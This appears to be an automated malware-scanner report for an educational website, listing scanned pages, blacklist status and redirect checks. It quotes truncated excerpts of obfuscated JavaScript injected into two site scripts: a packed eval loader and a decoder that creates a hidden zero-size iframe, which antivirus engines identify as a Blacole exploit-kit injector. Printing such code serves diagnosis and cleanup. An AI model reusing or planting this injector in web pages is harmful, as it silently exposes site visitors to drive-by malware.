Malware Scanner report for chea.edu.kh

Malicious/Suspicious/Total urls checked: 2/0/7

2 pages have malicious code. See details below

Blacklists: Found

The website is marked by Yandex as suspicious.

The website "chea.edu.kh" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/4

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=chea.edu.kh

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://chea.edu.kh/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://chea.edu.kh/	HTTP/1.1 302 Found Connection: close Date: Mon, 22 Dec 2014 20:23:19 GMT Location: http://www.chea.edu.kh/cheakhm/ Server: Apache/2.2.3 (CentOS) Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.3 X-Powered-By: PleskLin	clean
http://www.chea.edu.kh/cheakhm/	200 OK Content-Length: 56699 Content-Type: text/html	clean
http://www.chea.edu.kh/cheakhm/templates/it_tribune/js/mootools.php	500 Can't connect to www.chea.edu.kh:80 Content-Length: 190 Content-Type: text/plain	clean
http://www.chea.edu.kh/test404page.js	500 Can't connect to www.chea.edu.kh:80 Content-Length: 190 Content-Type: text/plain	clean
http://chea.edu.kh/cheakhm/templates/it_tribune/js/ice-menu.js	200 OK Content-Length: 19392 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]\|\|e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('A 2z=D 2A({2B:2C,4:{U:"2Z",2D:"30",R:"10 1l 18",Y:31,1m:1n.32.33.34,2E:2i,2F:1J,2G:1J,O:"Z",7:{x:"P",y:"V"},1s:{x:0,y:0},1c:{x:0,y:0},G:35,1d:19,1g:19,1R:19,36:1J},1a:D ... 3045 bytes are skipped ...06,550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));} if(f)e(s);} Antivirus reports: AntiVir JS/iFrame.BO.1 Avast JS:Redirector-XU [Trj] Ikarus Trojan.Script nProtect Exploit.JS.Blacole.BT Emsisoft Exploit.JS.Blacole.BT (B) Comodo TrojWare.JS.Agent.AM CAT-QuickHeal JS/BlacoleRef.BV McAfee-GW-Edition Heuristic.BehavesLike.JS.Suspicious.G DrWeb JS.IFrame.278 Kaspersky Trojan-Downloader.JS.Iframe.czf Microsoft Trojan:JS/BlacoleRef.BX MicroWorld-eScan Exploit.JS.Blacole.BT Fortinet JS/Iframe.W!tr Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Expack.uvpsi F-Secure Exploit.JS.Blacole.BT AVG HTML/Framer Norman Blacole.HB Sophos Mal/Iframe-AF GData Exploit.JS.Blacole.BT BitDefender Exploit.JS.Blacole.BT
http://chea.edu.kh/cheakhm/media/system/js/caption.js	200 OK Content-Length: 1963 Content-Type: application/x-javascript	clean
http://www.chea.edu.kh/cheakhm/plugins/content/plugin_besps/besps.js	200 OK Content-Length: 12951 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) function besps_slideshow(besps_slideid,besps_ftim,besps_stim,besps_steps,besps_startwhen,besps_emax,besps_caps,besps_preload){ var self = this; var slideid=besps_slideid; var ftim=besps_ftim; var stim=besps_stim; var steps=besps_steps; var startwhen=besps_startwhen; var emax=besps_emax; var preload=besps_preload; var stopit=1; var startim=1; var u=0; var parr = new Array(); var ptofade,pnext,factor,mytimeout; var caps=besps_c ... 3298 bytes are skipped ...06,550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));} if(f)e(s);} Decoded script: j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 ... 32997 bytes are skipped ... ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 / var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports: nProtect JS:Trojan.Iframer.C K7AntiVirus Trojan Emsisoft JS:Trojan.Iframer.C (B) Kaspersky HEUR:Trojan.Script.Iframer Microsoft Trojan:JS/Iframeinject.AB MicroWorld-eScan JS:Trojan.Iframer.C F-Secure JS:Trojan.Iframer.C F-Prot JS/IFrame.QW GData JS:Trojan.Iframer.C Commtouch JS/IFrame.QW BitDefender JS:Trojan.Iframer.C

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: chea.edu.kh

Result:
HTTP/1.1 302 Found
Connection: close
Date: Mon, 22 Dec 2014 20:23:19 GMT
Location: http://www.chea.edu.kh/cheakhm/
Server: Apache/2.2.3 (CentOS)
Content-Length: 0
Content-Type: text/html
X-Powered-By: PHP/5.3.3
X-Powered-By: PleskLin

...0 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: chea.edu.kh
Referer: http://www.google.com/search?q=chea.edu.kh

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for chea.edu.kh

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools